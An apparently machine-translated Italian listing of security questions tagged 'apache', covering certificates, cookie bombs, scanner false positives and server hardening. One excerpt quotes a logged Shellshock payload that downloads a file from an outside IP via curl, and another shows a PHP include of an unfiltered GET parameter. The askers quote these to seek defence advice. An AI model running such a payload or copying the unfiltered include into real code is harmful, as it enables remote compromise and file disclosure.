Domande con tag 'apache'

1
risposta

Come fa un browser a scegliere quale certificato utilizzare se il mio server web ha più certificati?

Sto utilizzando Apache 2.4, con due certificati, un RSA firmato da CACert e un ECC autofirmato. Nessuno di questi certificati fornisce un percorso per un certificato radice trusted-broswer. La mia domanda è questa: quando viene presentato con...
posta 18.11.2014 - 15:18
2
risposte

Come prevenire le bombe sui cookie?

Egor Homakov ha fatto una bella recensione ( Cookie Bomb o interrompiamo il Internet ) su come bloccare i CDN e altri siti Web con i cookie. Anche se si tratta di un DOS lato utente / browser, mi chiedo come si fermerebbe questo sul lato serv...
posta 21.07.2014 - 08:00
2
risposte

Versione di Apache falsa positiva nei risultati dello scanner su Centos

Recentemente ho bisogno di preoccuparmi di molte vulnerabilità false positive nei risultati dello scanner sulla versione di Apache. Esempio di vulnerabilità falsa positiva: Apache 2.2 < 2.2.16 Multiple Vulnerabilities I nostri clienti es...
posta 27.12.2013 - 17:59
1
risposta

Speaking Plain HTTP su una porta server abilitata SSL [chiusa]

atm Sto affrontando un problema con IE e Firefox perché non reindirizzano correttamente i miei collegamenti. Sto richiedendo la mia domanda tramite: https://myapp.example.de/context Nella mia webapplication ho collegamenti del genere: htt...
posta 25.11.2013 - 15:23
1
risposta

I registri di Apache mostrano l'esecuzione dei comandi

Mi chiedo se il mio server è compromesso o meno. Ho appena guardato il mio log e ho visto la seguente riga: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/u...
posta 28.12.2017 - 20:24
1
risposta

Qual è il problema di sicurezza di Options FollowSymLinks nella configurazione di Apache?

Qual è il problema di sicurezza da utilizzare Options FollowSymLinks nella configurazione di Apache? Utilizziamo la seguente configurazione: AllowOverride None Options None FollowSymLinks     
posta 22.05.2017 - 10:36
4
risposte

Rimuovi la possibilità di leggere i file di sistema con PHP da Apache

Quando carico un file php (file.php) con il seguente contenuto sul server Apache <?php $file = $_GET['file']; include ( $file); ?> Sono in grado di leggere qualsiasi file di Apache utilizzando gli URL di sotto http://domain.com/file...
posta 23.06.2016 - 16:13
2
risposte

Apache (pre-installato macOS) è un rischio per la sicurezza quando viene lanciato su una rete pubblica?

Per sviluppare il mio sito Web ho installato Apache preinstallato sul mio Mac e non ho realizzato fino ad oggi che il sito Web sul mio Mac è effettivamente accessibile anche da altri dispositivi nella rete. Questo è incredibilmente utile per me...
posta 28.11.2016 - 09:20
3
risposte

Come ottenere un certificato SSL per un IP pubblico

Sto usando Amazon EC2 per ospitare il mio database RDS . Accedo al database tramite le chiamate link all'istanza EC2, che a sua volta contatta il database. Vorrei utilizzare link per consentire una connessione più sicura. Sono nuovo ne...
posta 05.01.2017 - 21:27
1
risposta

Qual è lo scopo di questo attacco?

Quanto segue è un estratto di un output del registro di accesso di Apache durante le ultime 24 ore. link Note: Le richieste provengono da più di 5733 indirizzi IP univoci ~ 2 richieste al secondo, per un totale di ~ 5 GB di dati di re...
posta 13.10.2016 - 05:58